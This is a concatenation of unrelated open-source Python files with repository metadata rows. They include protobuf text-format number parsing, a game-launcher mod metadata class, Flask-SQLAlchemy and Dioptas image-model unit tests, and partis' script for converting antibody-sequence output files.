is_long: True if a long integer must be parsed.
Returns:
The integer parsed.
Raises:
ParseError: If an integer with given characteristics couldn't be consumed.
"""
try:
result = ParseInteger(tokenizer.token, is_signed=is_signed, is_long=is_long)
except ValueError as e:
raise tokenizer.ParseError(str(e))
tokenizer.NextToken()
return result
def ParseInteger(text, is_signed=False, is_long=False):
"""Parses an integer.
Args:
text: The text to parse.
is_signed: True if a signed integer must be parsed.
is_long: True if a long integer must be parsed.
Returns:
The integer value.
Raises:
ValueError: Thrown Iff the text is not a valid integer.
"""
# Do the actual parsing. Exception handling is propagated to caller.
result = _ParseAbstractInteger(text, is_long=is_long)
# Check if the integer is sane. Exceptions handled by callers.
checker = _INTEGER_CHECKERS[2 * int(is_long) + int(is_signed)]
checker.CheckValue(result)
return result
def _ParseAbstractInteger(text, is_long=False):
"""Parses an integer without checking size/signedness.
Args:
text: The text to parse.
is_long: True if the value should be returned as a long integer.
Returns:
The integer value.
Raises:
ValueError: Thrown Iff the text is not a valid integer.
"""
# Do the actual parsing. Exception handling is propagated to caller.
try:
# We force 32-bit values to int and 64-bit values to long to make
# alternate implementations where the distinction is more significant
# (e.g. the C++ implementation) simpler.
if is_long:
return long(text, 0)
else:
return int(text, 0)
except ValueError:
raise ValueError('Couldn\'t parse integer: %s' % text)
def ParseFloat(text):
"""Parse a floating point number.
Args:
text: Text to parse.
Returns:
The number parsed.
Raises:
ValueError: If a floating point number couldn't be parsed.
"""
try:
# Assume Python compatible syntax.
return float(text)
except ValueError:
# Check alternative spellings.
if _FLOAT_INFINITY.match(text):
if text[0] == '-':
return float('-inf')
else:
return float('inf')
elif _FLOAT_NAN.match(text):
return float('nan')
else:
# assume '1.0f' format
try:
return float(text.rstrip('f'))
except ValueError:
raise ValueError('Couldn\'t parse float: %s' % text)
def ParseBool(text):
"""Parse a boolean value.
Args:
text: Text to parse.
Returns:
Boolean values parsed
Raises:
ValueError: If text is not a valid boolean.
"""
if text in ('true', 't', '1', 'True'):
return True
elif text in ('false', 'f', '0', 'False'):
return False
else:
raise ValueError('Expected "true" or "false".')
def ParseEnum(field, value):
"""Parse an enum value.
The value can be specified by a number (the enum value), or by
a string literal (the enum name).
Args:
field: Enum field descriptor.
value: String value.
Returns:
Enum value number.
Raises:
ValueError: If the enum value could not be parsed.
"""
enum_descriptor = field.enum_type
try:
number = int(value, 0)
except ValueError:
# Identifier.
enum_value = enum_descriptor.values_by_name.get(value, None)
if enum_value is None:
raise ValueError('Enum type "%s" has no value named %s.' %
(enum_descriptor.full_name, value))
else:
# Numeric value.
enum_value = enum_descriptor.values_by_number.get(number, None)
if enum_value is None:
raise ValueError('Enum type "%s" has no value with number %d.' %
(enum_descriptor.full_name, number))
return enum_value.number
| spxtr/bazel | third_party/protobuf/3.4.0/python/google/protobuf/text_format.py | Python | apache-2.0 | 50,504 |
# Bulletproof Arma Launcher
# Copyright (C) 2016 Lukasz Taczuk
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from __future__ import unicode_literals
import base64
import errno
import json
import os
from kivy import Logger
from utils.paths import get_launcher_directory
class MetadataFile(object):
"""File that contains metadata about mods and is located in the root directory of each mod"""
"""TODO: Maybe screw the whole json part and just bencode everything?"""
file_extension = '.launcher_meta'
file_directory = 'mods_metadata'
_encoding = 'utf-8'
def __init__(self, mod_name):
super(MetadataFile, self).__init__()
file_name = '{}{}'.format(mod_name, self.file_extension)
self.file_path = os.path.join(get_launcher_directory(), self.file_directory, file_name)
self.data = {}
def get_file_name(self):
"""Returns the full path to the metadata file"""
return self.file_path
def read_data(self, ignore_open_errors=False):
"""Open the file and read its data to an internal variable
If ignore_open_errors is set to True, it will ignore errors while opening the file
(which may not exist along with the whole directory if the torrent is downloaded for the first time)"""
self.data = {}
try:
with open(self.get_file_name(), 'rb') as file_handle:
self.data = json.load(file_handle, encoding=MetadataFile._encoding)
except (IOError, ValueError):
if ignore_open_errors:
pass
else:
raise
def _create_missing_directories(self, dirpath):
"""Creates missing directories. Does not raise exceptions if the path already exists
Maybe move this to utils module in the future"""
try:
os.makedirs(dirpath)
except OSError as exc:
if exc.errno != errno.EEXIST or not os.path.isdir(dirpath):
raise
def write_data(self):
"""Open the file and write the contents of the internal data variable to the file"""
self._create_missing_directories(os.path.dirname(self.get_file_name()))
json_string = json.dumps(self.data, encoding=MetadataFile._encoding, indent=2)
with open(self.get_file_name(), 'wb') as file_handle:
file_handle.write(json_string)
def set_base64_key(self, key_name, value):
self.data[key_name] = base64.b64encode(value)
def get_base64_key(self, key_name):
data = self.data.setdefault(key_name, None)
if data:
try:
data = base64.b64decode(data)
except TypeError:
data = None
return data
# Accessors and mutators below
def set_torrent_url(self, url):
self.data['torrent_url'] = url
def get_torrent_url(self):
return self.data.setdefault('torrent_url', '')
def set_torrent_resume_data(self, data):
self.set_base64_key('torrent_resume_data', data)
def get_torrent_resume_data(self):
return self.get_base64_key('torrent_resume_data')
def set_torrent_content(self, torrent_content):
self.set_base64_key('torrent_content', torrent_content)
def get_torrent_content(self):
return self.get_base64_key('torrent_content')
def set_dirty(self, is_dirty):
"""Mark the torrent as dirty - in an inconsistent state (download started, we don't know what's exactly on disk)"""
self.data['dirty'] = bool(is_dirty)
Logger.info('set_dirty: Mod {}: {}'.format(self.get_file_name(), is_dirty))
def get_dirty(self):
return self.data.setdefault('dirty', False)
def set_force_creator_complete(self, complete):
self.data['force_creator_complete'] = complete
def get_force_creator_complete(self):
return self.data.setdefault('force_creator_complete', False)
| overfl0/Bulletproof-Arma-Launcher | src/utils/metadatafile.py | Python | gpl-3.0 | 4,301 |
from flask.ext.testing import TestCase
from sample_application.app import create_app
from sample_application.models import db, FavoriteColor
class TestDatabase(TestCase):
"""
Test flask-sqlalchemy database operations
"""
def create_app(self):
"""
Called once at the beginning of the tests; must return the application
instance
:return: flask.Flask application instance
"""
_app = create_app()
# Override whatever database uri is in the config for tests;
# Use an in-memory sqlite database to ensure that no production data
# are touched
_app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///"
return _app
def setUp(self):
"""
setUp and tearDown are run at the start of each test; ensure
that a fresh database is used for each test.
"""
db.create_all()
def tearDown(self):
"""
setUp and tearDown are run at the start of each test; ensure
that a fresh database is used for each test.
"""
db.session.remove()
db.drop_all()
def test_add_entry(self):
"""
Ensure that adding and retriving data from the database works
"""
c = FavoriteColor(
username='unittest',
color='red'
)
db.session.add(c)
db.session.commit()
rv = FavoriteColor.query.filter_by(username='unittest').first()
self.assertEqual(rv.username,'unittest')
self.assertEqual(rv.color, 'red') | jonnybazookatone/adsabs-webservices-blueprint | sample_application/tests/unittests/test_database.py | Python | mit | 1,557 |
# -*- coding: utf-8 -*-
# Dioptas - GUI program for fast processing of 2D X-ray diffraction data
# Principal author: Clemens Prescher ([email protected])
# Copyright (C) 2014-2019 GSECARS, University of Chicago, USA
# Copyright (C) 2015-2018 Institute for Geology and Mineralogy, University of Cologne, Germany
# Copyright (C) 2019 DESY, Hamburg, Germany
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from mock import MagicMock
import os
import numpy as np
from ..utility import QtTest
from ...model.ImgModel import ImgModel, BackgroundDimensionWrongException
from ...model.util.ImgCorrection import DummyCorrection
unittest_path = os.path.dirname(__file__)
data_path = os.path.join(unittest_path, '../data')
spe_path = os.path.join(data_path, 'spe')
class ImgModelTest(QtTest):
def setUp(self):
self.img_model = ImgModel()
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
def tearDown(self):
del self.img_model
def test_load_karabo_nexus_file(self):
self.img_model.load(os.path.join(data_path, 'karabo_epix.h5'))
def perform_transformations_tests(self):
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.rotate_img_m90()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.flip_img_horizontally()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.rotate_img_p90()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.flip_img_vertically()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.reset_transformations()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
def test_load_emits_signal(self):
callback_fcn = MagicMock()
self.img_model.img_changed.connect(callback_fcn)
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
callback_fcn.assert_called_once_with()
def test_flipping_images(self):
original_image = np.copy(self.img_model._img_data)
self.img_model.flip_img_vertically()
self.assertTrue(np.array_equal(self.img_model._img_data, np.flipud(original_image)))
def test_simple_background_subtraction(self):
self.first_image = np.copy(self.img_model.img_data)
self.img_model.load_next_file()
self.second_image = np.copy(self.img_model.img_data)
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.assertFalse(np.array_equal(self.first_image, self.img_model.img_data))
self.img_model.load_next_file()
self.assertEqual(np.sum(self.img_model.img_data), 0)
def test_background_subtraction_with_supersampling(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.img_model.set_supersampling(2)
self.img_model.set_supersampling(3)
self.img_model.load_next_file()
def test_background_subtraction_with_transformation(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
original_img = np.copy(self.img_model._img_data)
original_background = np.copy(self.img_model._background_data)
self.assertIsNotNone(self.img_model._background_data)
self.assertFalse(np.array_equal(self.img_model.img_data, self.img_model._img_data))
original_img_background_subtracted = np.copy(self.img_model.img_data)
self.assertTrue(np.array_equal(original_img_background_subtracted, original_img - original_background))
### now comes the main process - flipping the image
self.img_model.flip_img_vertically()
flipped_img = np.copy(self.img_model._img_data)
self.assertTrue(np.array_equal(np.flipud(original_img), flipped_img))
flipped_background = np.copy(self.img_model._background_data)
self.assertTrue(np.array_equal(np.flipud(original_background), flipped_background))
flipped_img_background_subtracted = np.copy(self.img_model.img_data)
self.assertTrue(np.array_equal(flipped_img_background_subtracted, flipped_img - flipped_background))
self.assertTrue(np.array_equal(np.flipud(original_img_background_subtracted),
flipped_img_background_subtracted))
self.assertEqual(np.sum(np.flipud(original_img_background_subtracted) - flipped_img_background_subtracted), 0)
self.img_model.load(os.path.join(data_path, 'image_002.tif'))
self.perform_transformations_tests()
def test_background_subtraction_with_supersampling_and_image_transformation(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.img_model.load(os.path.join(data_path, 'image_002.tif'))
self.img_model.set_supersampling(2)
self.assertEqual(self.img_model.img_data.shape, (4096, 4096))
self.perform_transformations_tests()
self.img_model.set_supersampling(3)
self.assertEqual(self.img_model.img_data.shape, (6144, 6144))
self.perform_transformations_tests()
self.img_model.load(os.path.join(data_path, 'image_002.tif'))
self.assertEqual(self.img_model.img_data.shape, (6144, 6144))
self.perform_transformations_tests()
def test_background_scaling_and_offset(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
# assure that everything is correct before
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - self.img_model._background_data))
# set scaling and see difference
self.img_model.background_scaling = 2.4
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - 2.4 * self.img_model._background_data))
# set offset and see the difference
self.img_model.background_scaling = 1.0
self.img_model.background_offset = 100.0
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - (self.img_model._background_data + 100.0)))
# use offset and scaling combined
self.img_model.background_scaling = 2.3
self.img_model.background_offset = 100.0
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - (2.3 * self.img_model._background_data + 100)))
def test_background_with_different_shape(self):
with self.assertRaises(BackgroundDimensionWrongException):
self.img_model.load_background(os.path.join(data_path, 'CeO2_Pilatus1M.tif'))
self.assertEqual(self.img_model._background_data, None)
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.assertTrue(self.img_model._background_data is not None)
self.img_model.load(os.path.join(data_path, 'CeO2_Pilatus1M.tif'))
self.assertEqual(self.img_model._background_data, None)
def test_absorption_correction_with_supersampling(self):
original_image = np.copy(self.img_model._img_data)
dummy_correction = DummyCorrection(self.img_model.img_data.shape, 0.6)
self.img_model.add_img_correction(dummy_correction, "Dummy 1")
self.assertAlmostEqual(np.sum(original_image / 0.6), np.sum(self.img_model.img_data), places=4)
self.img_model.set_supersampling(2)
self.img_model.img_data
def test_absorption_correction_with_different_image_sizes(self):
dummy_correction = DummyCorrection(self.img_model.img_data.shape, 0.4)
# self.img_data.set_absorption_correction(np.ones(self.img_data._img_data.shape)*0.4)
self.img_model.add_img_correction(dummy_correction, "Dummy 1")
self.assertTrue(self.img_model._img_corrections.has_items())
self.img_model.load(os.path.join(data_path, 'CeO2_Pilatus1M.tif'))
self.assertFalse(self.img_model.has_corrections())
def test_adding_several_absorption_corrections(self):
original_image = np.copy(self.img_model.img_data)
img_shape = original_image.shape
self.img_model.add_img_correction(DummyCorrection(img_shape, 0.4))
self.img_model.add_img_correction(DummyCorrection(img_shape, 3))
self.img_model.add_img_correction(DummyCorrection(img_shape, 5))
self.assertTrue(np.sum(original_image) / (0.5 * 3 * 5), np.sum(self.img_model.img_data))
self.img_model.delete_img_correction(1)
self.assertTrue(np.sum(original_image) / (0.5 * 5), np.sum(self.img_model.img_data))
def test_saving_data(self):
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
filename = os.path.join(data_path, 'test.tif')
self.img_model.save(filename)
first_img_array = np.copy(self.img_model._img_data)
self.img_model.load(filename)
self.assertTrue(np.array_equal(first_img_array, self.img_model._img_data))
self.assertTrue(os.path.exists(filename))
os.remove(filename)
def test_negative_rotation(self):
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_combined_rotation(self):
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_m90()
self.img_model.rotate_img_p90()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_flip_img_horizontally(self):
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_horizontally()
self.img_model.flip_img_horizontally()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_flip_img_vertically(self):
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_vertically()
self.img_model.flip_img_vertically()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_combined_rotation_and_flipping(self):
self.img_model.flip_img_vertically()
self.img_model.flip_img_horizontally()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_p90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.flip_img_horizontally()
transformed_data = self.img_model.img_data
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
self.assertTrue(np.array_equal(self.img_model.img_data, transformed_data))
def test_reset_img_transformation(self):
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_m90()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_p90()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_horizontally()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_vertically()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_vertically()
self.img_model.flip_img_horizontally()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_p90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.flip_img_horizontally()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_loading_a_tagged_tif_file_and_retrieving_info_string(self):
self.img_model.load(os.path.join(data_path, "attrib.tif"))
self.assertIn("areaDetector", self.img_model.file_info)
def test_loading_spe_file(self):
self.img_model.load(os.path.join(spe_path, 'CeO2_PI_CCD_Mo.SPE'))
self.assertEqual(self.img_model.img_data.shape, (1042, 1042))
def test_summing_files(self):
data1 = np.copy(self.img_model._img_data).astype(np.uint32)
self.img_model.add(os.path.join(data_path, 'image_001.tif'))
self.assertTrue(np.array_equal(2 * data1, self.img_model._img_data))
def test_summing_rotated(self):
self.img_model.rotate_img_m90()
data1 = np.copy(self.img_model._img_data).astype(np.uint32)
self.img_model.add(os.path.join(data_path, 'image_001.tif'))
self.assertTrue(np.array_equal(2 * data1, self.img_model._img_data))
if __name__ == '__main__':
unittest.main()
| erangre/Dioptas | dioptas/tests/unit_tests/test_ImgModel.py | Python | gpl-3.0 | 14,066 |
#!/usr/bin/env python
import sys
import csv
csv.field_size_limit(sys.maxsize) # make sure we can write very large csv fields
import os
import argparse
import colored_traceback.always
# if you move this script, you'll need to change this method of getting the imports
partis_dir = os.path.dirname(os.path.realpath(__file__)).replace('/bin', '')
sys.path.insert(1, partis_dir + '/python')
import utils
import glutils
# ----------------------------------------------------------------------------------------
def count_plot(tglfo, tlist, plotdir, paired_loci=None):
if len(tlist) == 0:
return
if args.plot_tree_mut_stats:
import plotting
plotting.plot_tree_mut_stats(plotdir, tlist, args.is_simu, only_leaves=args.only_plot_leaves, treefname=args.treefname)
return
if args.only_count_correlations:
from corrcounter import CorrCounter
ccounter = CorrCounter(paired_loci=paired_loci)
for line in tlist:
l_info = None
if paired_loci is not None:
line, l_info = line
ccounter.increment(line, l_info=l_info)
ccounter.plot(plotdir + '/correlations', only_csv=args.only_csv_plots, debug=args.debug)
return
if args.simfname is not None:
simglfo, true_antn_list, _ = utils.read_output(args.simfname)
true_antn_dict = {}
for true_line in true_antn_list:
for iseq, uid in enumerate(true_line['unique_ids']):
true_antn_dict[uid] = utils.synthesize_single_seq_line(true_line, iseq)
# true_antn_dict = utils.get_annotation_dict(true_antn_list)
from performanceplotter import PerformancePlotter
perfplotter = PerformancePlotter('hmm')
n_failed = 0
for line in tlist:
if line['invalid']:
n_failed += 1
continue
for iseq, uid in enumerate(line['unique_ids']): # NOTE this counts rearrangement-level parameters once for every mature sequence, which is inconsistent with the pcounters... but I think might make more sense here?
_ = perfplotter.evaluate(true_antn_dict[uid], utils.synthesize_single_seq_line(line, iseq), simglfo=simglfo)
perfplotter.plot(args.plotdir, only_csv=args.only_csv_plots)
if n_failed > 0:
print ' %s %d / %d failed queries' % (utils.color('yellow', 'warning'), n_failed, len([u for l in tlist for u in l['unique_ids']]))
if args.only_plot_performance:
return
assert not args.paired # only handled for correlation counting atm
from parametercounter import ParameterCounter
setattr(args, 'region_end_exclusions', {r : [0 for e in ['5p', '3p']] for r in utils.regions}) # hackity hackity hackity
pcounter = ParameterCounter(tglfo, args) # NOTE doesn't count correlations by default
for line in tlist:
pcounter.increment(line)
pcounter.plot(plotdir, only_csv=args.only_csv_plots, only_overall=args.only_overall_plots) #, make_per_base_plots=True) , make_per_base_plots=True
# ----------------------------------------------------------------------------------------
helpstr = """
Extract sequences from a partis output file and write them to a fasta, csv, or tsv file, optionally with a limited amount of extra information for each sequence.
For details of partis output files, see the manual.
To view the partitions and annotations in a partis output file, use the partis \'view-output\' action.
Example usage:
./bin/parse-output.py test/reference-results/partition-new-simu.yaml out.fa
"""
class MultiplyInheritedFormatter(argparse.RawTextHelpFormatter, argparse.ArgumentDefaultsHelpFormatter):
pass
formatter_class = MultiplyInheritedFormatter
parser = argparse.ArgumentParser(formatter_class=MultiplyInheritedFormatter, description=helpstr)
parser.add_argument('infile', help='partis output file from which to read input')
parser.add_argument('outfile', help='file to which to write output extracted from <infile> (fasta or csv/tsv)')
parser.add_argument('--paired', action='store_true', help='if set, <infile> should be a paired output dir, rather than a single file')
parser.add_argument('--extra-columns', help='colon-separated list of additional partis output columns (beyond sequences), to write to the output file. If writing to a fasta file, the column values are appended after the sequence name, separated by --fasta-info-separator. If writing to csv/tsv, they\'re written as proper, labeled columns.')
parser.add_argument('--partition-index', type=int, help='if set, use the partition at this index in the cluster path, rather than the default of using the best partition')
parser.add_argument('--seed-unique-id', help='if set, take sequences only from the cluster containing this seed sequence, rather than the default of taking all sequences from all clusters')
parser.add_argument('--cluster-index', type=int, help='if set, take sequences only from the cluster at this index in the partition, rather than the default of taking all sequences from all clusters. This index is with respect to the cluster order found in the file (which, in contrast to plots made by --plotdir, is *not* sorted by size)')
parser.add_argument('--indel-reversed-seqs', action='store_true', help='if set, take sequences that have had any shm indels "reversed" (i.e. insertions are reversed, and deletions are replaced with the germline bases) rather than the default of using sequences from the original input file. Indel-reversed sequences can be convenient because they are by definition the same length as and aligned to the naive sequence.')
parser.add_argument('--glfo-dir', help='Directory with germline info. Only necessary for old-style csv output files. Equivalent to a parameter dir with \'/hmm/germline-sets\' appended.')
parser.add_argument('--template-glfo-dir', help='use this glfo dir as a template when reading --glfo-dir (only used for airr input atm)')
parser.add_argument('--locus', default='igh', help='only used for old-style csv output files')
parser.add_argument('--plotdir', help='if set, plot annotation parameters from infile to --plotdir and exit (you still have to set outfile, sorry, since it\'s nice having it be a positional arg, but it doesn\'t get used for this). To add e.g. per-gene-per-position plots comment/uncomment args in the call below.')
parser.add_argument('--only-count-correlations', action='store_true', help='')
parser.add_argument('--only-plot-performance', action='store_true', help='')
parser.add_argument('--fasta-info-separator', default=' ', help='character to use ')
parser.add_argument('--debug', type=int, default=0)
parser.add_argument('--airr-input', action='store_true', help='read input in AIRR tsv format, and if output file suffix is .yaml write partis output.')
parser.add_argument('--airr-output', action='store_true', help='write output in AIRR tsv format')
parser.add_argument('--skip-other-locus', action='store_true', help='if --airr-output is set, this tells us to skip lines from the other locus')
parser.add_argument('--skip-columns', help='don\'t write these columns to output (atm only implemented for airr output, since we need to remove the clone_id column so scoper doesn\'t crash)')
parser.add_argument('--simfname', help='simulation file corresponding to input file (i.e. presumably <infile> is inference that was performed on --simfname')
parser.add_argument('--only-csv-plots', action='store_true', help='only write csv versions of plots (not svg), which is a lot faster')
parser.add_argument('--only-make-plots', action='store_true', help='if --plotdir is set, set this to only do plotting, i.e. don\'t do the usual/default file reading/conversion')
parser.add_argument('--plot-tree-mut-stats', action='store_true', help='plot tree mutation stats and exit')
parser.add_argument('--only-plot-leaves', action='store_true', help='only affects --plot-tree-mut-stats')
parser.add_argument('--is-simu', action='store_true', help='only affects --plot-tree-mut-stats')
parser.add_argument('--only-overall-plots', action='store_true', help='TODO')
parser.add_argument('--treefname', help='only affects --plot-tree-mut-stats')
if 'extract-fasta.py' in sys.argv[0]: # if they're trying to run this old script, which is now just a link to this one, print a warning and rejigger the arguments so it still works
print ' note: running deprecated script %s, which currently is just a link pointing to %s' % (os.path.basename(sys.argv[0]), os.path.basename(os.path.realpath( __file__)))
print ' note: transferring deprecated arguments --input-file and --fasta-output-file to the first two positional arguments (this will continue to work, you only need to change things if you want this warning to go away)'
utils.insert_in_arglist(sys.argv, [utils.get_val_from_arglist(sys.argv, '--input-file'), utils.get_val_from_arglist(sys.argv, '--fasta-output-file')], sys.argv[0])
utils.remove_from_arglist(sys.argv, '--input-file', has_arg=True)
utils.remove_from_arglist(sys.argv, '--fasta-output-file', has_arg=True)
args = parser.parse_args()
args.extra_columns = utils.get_arg_list(args.extra_columns)
assert utils.getsuffix(args.outfile) in ['.csv', '.tsv', '.fa', '.fasta'] or args.airr_input and utils.getsuffix(args.outfile) == '.yaml'
default_glfo_dir = partis_dir + '/data/germlines/human'
if utils.getsuffix(args.infile) in ['.csv', '.tsv'] and args.glfo_dir is None:
print ' note: reading csv/tsv format without germline info, so need to get germline info from a separate directory; --glfo-dir was not set, so using default %s. If it doesn\'t crash, it\'s probably ok.' % default_glfo_dir
args.glfo_dir = default_glfo_dir
# ----------------------------------------------------------------------------------------
# read input
if args.paired:
import paircluster
def getofn(ltmp, lpair=None):
ofn = paircluster.paired_fn(args.infile, ltmp, lpair=lpair, suffix='.yaml')
if not os.path.exists(ofn): # first look for simy file (just e.g. igh.yaml), if it's not there look for the partition output file
ofn = paircluster.paired_fn(args.infile, ltmp, lpair=lpair, actstr='partition', suffix='.yaml')
return ofn
lp_infos = paircluster.read_lpair_output_files(utils.locus_pairs['ig'], getofn)
else:
if args.airr_input:
glfo, glfd = None, args.glfo_dir
if args.template_glfo_dir is not None: # NOTE only handled for airr input at the moment, cause that's what i need it for right now
glfo = glutils.read_glfo(args.glfo_dir, args.locus, template_glfo=glutils.read_glfo(args.template_glfo_dir, args.locus))
# glutils.write_glfo(args.glfo_dir + '-parsed', glfo, debug=True)
glfd = None
glfo, annotation_list, cpath = utils.read_airr_output(args.infile, locus=args.locus, glfo=glfo, glfo_dir=glfd, skip_other_locus=args.skip_other_locus)
else:
glfo, annotation_list, cpath = utils.read_output(args.infile, glfo_dir=args.glfo_dir, locus=args.locus)
# plot
if args.plotdir is not None:
if args.paired:
for lpair in utils.locus_pairs['ig']:
if lp_infos[tuple(lpair)]['glfos'] is None:
continue
for ltmp in lpair:
count_plot(lp_infos[tuple(lpair)]['glfos'][ltmp], lp_infos[tuple(lpair)]['antn_lists'][ltmp], '%s/%s/%s'%(args.plotdir, '+'.join(lpair), ltmp))
antn_pairs = paircluster.find_cluster_pairs(lp_infos, lpair) #, debug=True)
count_plot(None, antn_pairs, '%s/%s'%(args.plotdir, '+'.join(lpair)), paired_loci=[l['loci'][0] for l in antn_pairs[0]])
else:
count_plot(glfo, annotation_list, args.plotdir)
if args.only_make_plots:
sys.exit(0)
assert not args.paired # only handled for plotting above atm
# restrict to certain partitions/clusters
if cpath is None or cpath.i_best is None:
clusters_to_use = [l['unique_ids'] for l in annotation_list]
print ' no cluster path in input file, so just using all %d sequences (in %d clusters) in annotations' % (sum(len(c) for c in clusters_to_use), len(clusters_to_use))
else:
ipartition = cpath.i_best if args.partition_index is None else args.partition_index
print ' found %d clusters in %s' % (len(cpath.partitions[ipartition]), 'best partition' if args.partition_index is None else 'partition at index %d (of %d)' % (ipartition, len(cpath.partitions)))
if args.cluster_index is None:
clusters_to_use = cpath.partitions[ipartition]
print ' taking all %d clusters' % len(clusters_to_use)
else:
clusters_to_use = [cpath.partitions[ipartition][args.cluster_index]]
print ' taking cluster at index %d with size %d' % (args.cluster_index, len(clusters_to_use[0]))
if args.seed_unique_id is not None:
clusters_to_use = [c for c in clusters_to_use if args.seed_unique_id in c] # NOTE can result in more than one cluster with the seed sequence (e.g. if this file contains intermediate annotations from seed partitioning))
print ' removing clusters not containing sequence \'%s\' (leaving %d)' % (args.seed_unique_id, len(clusters_to_use))
if not os.path.exists(os.path.dirname(os.path.abspath(args.outfile))):
os.makedirs(os.path.dirname(os.path.abspath(args.outfile)))
if args.airr_output:
print ' writing %d sequences to %s' % (len(annotation_list), args.outfile)
utils.write_airr_output(args.outfile, annotation_list, cpath=cpath, extra_columns=args.extra_columns, skip_columns=args.skip_columns)
sys.exit(0)
# condense partis info into <seqfos> for fasta/csv output
seqfos = []
annotations = {':'.join(adict['unique_ids']) : adict for adict in annotation_list} # collect the annotations in a dictionary so they're easier to access
for cluster in clusters_to_use:
if ':'.join(cluster) not in annotations:
print ' %s cluster with size %d not in annotations, so skipping it' % (utils.color('red', 'warning'), len(cluster))
continue
cluster_annotation = annotations[':'.join(cluster)]
newfos = [{'name' : u, 'seq' : s} for u, s in zip(cluster_annotation['unique_ids'], cluster_annotation['seqs' if args.indel_reversed_seqs else 'input_seqs'])]
if args.extra_columns is not None:
for ecol in args.extra_columns:
if ecol not in cluster_annotation:
utils.add_extra_column(ecol, cluster_annotation, cluster_annotation)
# raise Exception('column \'%s\' not found in annotations' % ecol)
for iseq in range(len(newfos)):
ival = cluster_annotation[ecol]
if ecol in utils.linekeys['per_seq']:
ival = ival[iseq]
newfos[iseq][ecol] = ival
seqfos += newfos
# write output
print ' writing %d sequences to %s' % (len(seqfos), args.outfile)
with open(args.outfile, 'w') as ofile:
if utils.getsuffix(args.outfile) in ['.csv', '.tsv']:
writer = csv.DictWriter(ofile, seqfos[0].keys(), delimiter=',' if utils.getsuffix(args.outfile)=='.csv' else '\t')
writer.writeheader()
for sfo in seqfos:
writer.writerow(sfo)
elif utils.getsuffix(args.outfile) in ['.fa', '.fasta']:
for sfo in seqfos:
estr = ''
if args.extra_columns is not None:
estr = args.fasta_info_separator
estr += args.fasta_info_separator.join(str(sfo[c]) for c in args.extra_columns)
ofile.write('>%s%s\n%s\n' % (sfo['name'], estr, sfo['seq']))
elif utils.getsuffix(args.outfile) == '.yaml':
true_partition = None
if args.simfname is not None:
_, _, true_cpath = utils.read_output(args.simfname, skip_annotations=True)
true_partition = true_cpath.best()
plines = cpath.get_partition_lines(true_partition=true_partition, calc_missing_values='none' if true_partition is None else 'best')
utils.write_annotations(args.outfile, glfo, annotation_list, utils.add_lists(utils.annotation_headers, args.extra_columns), partition_lines=plines)
else:
assert False
| psathyrella/partis | bin/parse-output.py | Python | gpl-3.0 | 16,139 |
Subsets and Splits